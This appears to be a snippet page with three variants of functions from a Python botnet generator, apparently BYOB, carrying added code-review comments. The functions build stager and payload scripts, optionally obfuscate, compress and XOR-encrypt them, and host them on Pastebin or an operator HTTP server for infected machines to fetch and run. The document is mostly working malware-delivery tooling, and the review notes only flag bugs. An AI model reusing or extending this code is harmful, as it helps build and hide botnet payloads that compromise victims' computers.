Пример #1
def _stager(options, **kwargs):
    """Assemble the stager script, optionally compress it, and publish it.

    The stager text is the contents of 'core/stagers.py' followed by whatever
    generators.main('run', ...) returns. The result is either posted through
    util.pastebin or written to '<stagers dir>/<var>.py', and the returned URL
    points at options.host over plain HTTP on port int(options.port) + 1.

    Args:
        options: parsed options object; this function reads .encrypt,
            .compress, .pastebin, .host and .port.
        **kwargs: must contain 'url', 'key' and 'var'. 'key' is required even
            when options.encrypt is false, although it is only used when it
            is true.

    Returns:
        The URL at which the stager is hosted.

    Raises:
        AssertionError: if a required keyword argument is missing (only while
            assertions are enabled).
    """
    util.display("\n[>]", color='green', style='bright', end=',')
    util.display("Stager", color='reset', style='bright')

    # NOTE(review): assert statements are removed under `python -O`; a missing
    # argument would then surface further down as a KeyError.
    assert 'url' in kwargs, "missing keyword argument 'url'"
    assert 'key' in kwargs, "missing keyword argument 'key'"
    assert 'var' in kwargs, "missing keyword argument 'var'"

    # The key is forwarded to the generator only when encryption is enabled.
    # NOTE(review): the handle returned by open() is never closed explicitly.
    if options.encrypt:
        stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'], key=kwargs['key'])
    else:
        stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'])

    # Best-effort directory creation: every OSError is logged as a permission
    # problem and execution continues regardless.
    if not os.path.isdir('modules/stagers'):
        try:
            os.mkdir('modules/stagers')
        except OSError:
            util.log("Permission denied: unable to make directory './modules/stagers/'")

    if options.compress:
        util.display("\tCompressing stager... ", color='reset', style='normal', end=',')
        # presumably _spinner shows a progress indicator until the event is
        # set - confirm against _spinner; __spin__ is not read again here.
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(stager)
        __load__.set()
        # _update receives the text before and after the step; presumably it
        # reports the size change - confirm against _update.
        _update(stager, output, task='Compression')
        stager = output

    util.display("\tUploading stager... ", color='reset', style='normal', end=',')
    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        # This assert cannot fail: the enclosing `if` already established that
        # options.pastebin is truthy.
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(stager, options.pastebin)
    else:
        # The loop has no break, so the LAST existing candidate wins; '.' is
        # used when none of them exist.
        dirs = ['modules/stagers','byob/modules/stagers','byob/byob/modules/stagers']
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        # NOTE(review): kwargs['var'] becomes a file name without validation; a
        # value containing path separators would land outside the chosen
        # directory. Confirm callers only pass generated identifiers.
        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py' )

        with open(path, 'w') as fp:
            fp.write(stager)

        # Build the URL: '<cwd>/modules' is removed from the absolute path to
        # form the URL path. When the file was written outside '<cwd>/modules'
        # nothing is removed and the full local path ends up in the URL.
        s = 'http://{}:{}/{}'.format(options.host, int(options.port) + 1, urllib.pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'), '')))
        s = urllib2.urlparse.urlsplit(s)
        # normpath collapses duplicate separators but may introduce backslashes
        # on Windows; the final replace() restores forward slashes.
        url = urllib2.urlparse.urlunsplit((s.scheme, s.netloc, os.path.normpath(s.path), s.query, s.fragment)).replace('\\','/')

    # NOTE(review): if the upload or write above raises, the event is never
    # set on this path.
    __load__.set()
    util.display("(hosting stager at: {})".format(url), color='reset', style='dim')
    return url
Пример #2
def _payload(options, **kwargs):
    """Assemble the payload script, optionally transform it, and publish it.

    The payload text is, joined by newlines: the contents of 'core/loader.py',
    one 'import X' line per entry of kwargs['hidden'] (minus two excluded
    names), the part of each module file that follows its '# main' marker, and
    the text returned by generators.main('Payload', ...) with '_payload.run()'
    appended. Compression and encryption are applied in that order when
    enabled. The result is posted through util.pastebin or written to
    '<payloads dir>/<var>.py', and the returned URL points at options.host
    over plain HTTP on port int(options.port) + 1.

    Args:
        options: parsed options object; this function reads .host, .port,
            .pastebin, .compress and .encrypt.
        **kwargs: 'var', 'modules' and 'imports' are asserted; 'hidden' is
            read without a check; 'key' is required when options.encrypt is
            set.

    Returns:
        The URL at which the payload is hosted.

    Raises:
        AssertionError: if an asserted keyword argument is missing (only while
            assertions are enabled).
        KeyError: if 'hidden' is missing.
    """
    util.display("\n[>]", color='green', style='bright', end=' ')
    util.display("Payload", color='reset', style='bright')

    # NOTE(review): assert statements are removed under `python -O`.
    # 'imports' is asserted here but never read in this version, while
    # 'hidden' is read below without being asserted.
    assert 'var' in kwargs, "missing keyword argument 'var'"
    assert 'modules' in kwargs, "missing keyword argument 'modules'"
    assert 'imports' in kwargs, "missing keyword argument 'imports'"

    # Earlier variant kept by the author: loader text plus a generated loader.
    #    loader  = '\n'.join((open('core/loader.py','r').read(), generators.loader(host=options.host, port=int(options.port)+2, packages=list(kwargs['hidden']))))
    # NOTE(review): the handles returned by open() in this function are never
    # closed explicitly.
    loader = open('core/loader.py', 'r').read()
    # One plain import statement per hidden package, skipping 'StringIO' and
    # '_winreg'.
    test_imports = '\n'.join([
        'import ' + i for i in list(kwargs['hidden'])
        if i not in ['StringIO', '_winreg']
    ])
    # partition('# main')[2] keeps only the text after the first '# main'
    # marker; a module without the marker contributes an empty string.
    # '_payload.run()' is concatenated to the generator output without a
    # separator - presumably that output ends with a newline; confirm.
    modules = '\n'.join(([
        open(module, 'r').read().partition('# main')[2]
        for module in kwargs['modules']
    ] + [
        generators.main(
            'Payload', **{
                "host": options.host,
                "port": options.port,
                "pastebin": options.pastebin if options.pastebin else str()
            }) + '_payload.run()'
    ]))
    payload = '\n'.join((loader, test_imports, modules))

    # Best-effort directory creation: every OSError is logged as a permission
    # problem and execution continues regardless.
    if not os.path.isdir('modules/payloads'):
        try:
            os.mkdir('modules/payloads')
        except OSError:
            util.log(
                "Permission denied: unabled to make directory './modules/payloads/'"
            )

    if options.compress:
        util.display("\tCompressing payload... ",
                     color='reset',
                     style='normal',
                     end=' ')
        # presumably _spinner shows a progress indicator until the event is
        # set - confirm against _spinner; __spin__ is not read again here.
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(payload)
        __load__.set()
        # _update receives the text before and after the step; presumably it
        # reports the size change - confirm against _update.
        _update(payload, output, task='Compression')
        payload = output

    if options.encrypt:
        assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
        # The format string has no placeholder, so .format() is a no-op and
        # the key is not printed.
        util.display("\tEncrypting payload... ".format(kwargs['key']),
                     color='reset',
                     style='normal',
                     end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        # The key arrives base64-encoded and is decoded before use. The
        # helper's name indicates an XOR scheme; its implementation is not
        # visible here.
        output = security.encrypt_xor(payload, base64.b64decode(kwargs['key']))
        __load__.set()
        _update(payload, output, task='Encryption')
        payload = output

    util.display("\tUploading payload... ",
                 color='reset',
                 style='normal',
                 end=' ')

    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        # This assert cannot fail: the enclosing `if` already established that
        # options.pastebin is truthy.
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(payload, options.pastebin)
    else:
        # The loop has no break, so the LAST existing candidate wins; '.' is
        # used when none of them exist.
        dirs = [
            'modules/payloads', 'byob/modules/payloads',
            'byob/byob/modules/payloads'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        # NOTE(review): kwargs['var'] becomes a file name without validation; a
        # value containing path separators would land outside the chosen
        # directory. Confirm callers only pass generated identifiers.
        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')

        with open(path, 'w') as fp:
            fp.write(payload)

        # Build the URL: '<cwd>/modules' is removed from the absolute path to
        # form the URL path. When the file was written outside '<cwd>/modules'
        # nothing is removed and the full local path ends up in the URL.
        s = 'http://{}:{}/{}'.format(
            options.host,
            int(options.port) + 1,
            pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
                                      '')))
        s = urlparse.urlsplit(s)
        # normpath collapses duplicate separators but may introduce backslashes
        # on Windows; the final replace() restores forward slashes.
        url = urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')

    # NOTE(review): if the upload or write above raises, the event is never
    # set on this path.
    __load__.set()
    util.display("(hosting payload at: {})".format(url),
                 color='reset',
                 style='dim')
    return url
Пример #3
def _payload(options, **kwargs):
    """Assemble the payload script, optionally transform it, and publish it.

    The payload text is kwargs['imports'] and the part of each module file
    that follows its '# main' marker, joined by newlines, followed by the text
    returned by generators.main('Payload', ...) and '_payload.run()'.
    Obfuscation, compression and encryption are applied in that order when
    enabled. The result is posted through util.pastebin or written to
    '<payloads dir>/<var>.py', and the returned URL points at options.host
    over plain HTTP on port int(options.port) + 1.

    Args:
        options: parsed options object; this function reads .host, .port,
            .pastebin, .obfuscate, .compress and .encrypt.
        **kwargs: must contain 'var', 'modules' and 'imports'; 'key' is
            required when options.encrypt is set.

    Returns:
        The URL at which the payload is hosted.

    Raises:
        AssertionError: if a required keyword argument is missing (only while
            assertions are enabled).
    """
    util.display("\n[>]", color='green', style='bright', end=',')
    util.display("Payload", color='reset', style='bright')
    # NOTE(review): assert statements are removed under `python -O`; a missing
    # argument would then surface further down as a KeyError.
    assert 'var' in kwargs, "missing keyword argument 'var'"
    assert 'modules' in kwargs, "missing keyword argument 'modules'"
    assert 'imports' in kwargs, "missing keyword argument 'imports'"
    # partition('# main')[2] keeps only the text after the first '# main'
    # marker; a module without the marker contributes an empty string.
    # The generator output and '_payload.run()' are concatenated to the joined
    # text without a separator - presumably the generator output starts and
    # ends with a newline; confirm.
    # NOTE(review): the handles returned by open() are never closed explicitly.
    payload = '\n'.join(
        list(kwargs['imports']) + [
            open(module, 'r').read().partition('# main')[2]
            for module in kwargs['modules']
        ]) + generators.main(
            'Payload', **{
                "host": options.host,
                "port": options.port,
                "pastebin": options.pastebin if options.pastebin else str()
            }) + '_payload.run()'
    # Best-effort directory creation: every OSError is logged at debug level
    # as a permission problem and execution continues regardless.
    if not os.path.isdir('modules/payloads'):
        try:
            os.mkdir('modules/payloads')
        except OSError:
            __logger__.debug(
                "Permission denied: unabled to make directory './modules/payloads/'"
            )

    if options.obfuscate:
        # presumably _spinner shows a progress indicator until the event is
        # set - confirm against _spinner; __spin__ is not read again here.
        __load__ = threading.Event()
        util.display("\tObfuscating payload... ",
                     color='reset',
                     style='normal',
                     end=',')
        __spin__ = _spinner(__load__)
        # Trailing whitespace is stripped and every line containing '=jobs' is
        # dropped from the obfuscated text; the reason for that filter is not
        # visible here.
        output = '\n'.join([
            line
            for line in generators.obfuscate(payload).rstrip().splitlines()
            if '=jobs' not in line
        ])
        __load__.set()
        # _update receives the text before and after the step; presumably it
        # reports the size change - confirm against _update.
        _update(payload, output, task='Obfuscation')
        payload = output

    if options.compress:
        util.display("\tCompressing payload... ",
                     color='reset',
                     style='normal',
                     end=',')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(payload)
        __load__.set()
        _update(payload, output, task='Compression')
        payload = output

    if options.encrypt:
        assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
        # The format string has no placeholder, so .format() is a no-op and
        # the key is not printed.
        util.display("\tEncrypting payload... ".format(kwargs['key']),
                     color='reset',
                     style='normal',
                     end=',')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        # The key is passed through as given; the scheme used by
        # generators.encrypt is not visible here.
        output = generators.encrypt(payload, kwargs['key'])
        __load__.set()
        _update(payload, output, task='Encryption')
        payload = output

    util.display("\tUploading payload... ",
                 color='reset',
                 style='normal',
                 end=',')
    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        # This assert cannot fail: the enclosing `if` already established that
        # options.pastebin is truthy.
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(payload, api_dev_key=options.pastebin)
    else:
        # The loop has no break, so the LAST existing candidate wins; '.' is
        # used when none of them exist.
        dirs = [
            'modules/payloads', 'byob/modules/payloads',
            'byob/byob/modules/payloads'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d
        # NOTE(review): kwargs['var'] becomes a file name without validation; a
        # value containing path separators would land outside the chosen
        # directory. Confirm callers only pass generated identifiers.
        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')
        # file() is a Python 2 builtin; it does not exist in Python 3.
        with file(path, 'w') as fp:
            fp.write(payload)
        # Build the URL: '<cwd>/modules' is removed from the absolute path to
        # form the URL path. When the file was written outside '<cwd>/modules'
        # nothing is removed and the full local path ends up in the URL.
        s = 'http://{}:{}/{}'.format(
            options.host,
            int(options.port) + 1,
            urllib.pathname2url(
                path.replace(os.path.join(os.getcwd(), 'modules'), '')))
        s = urllib2.urlparse.urlsplit(s)
        # normpath collapses duplicate separators but may introduce backslashes
        # on Windows; the final replace() restores forward slashes.
        url = urllib2.urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')
    # NOTE(review): if the upload or write above raises, the event is never
    # set on this path.
    __load__.set()
    util.display("(hosting payload at: {})".format(url),
                 color='reset',
                 style='dim')
    return url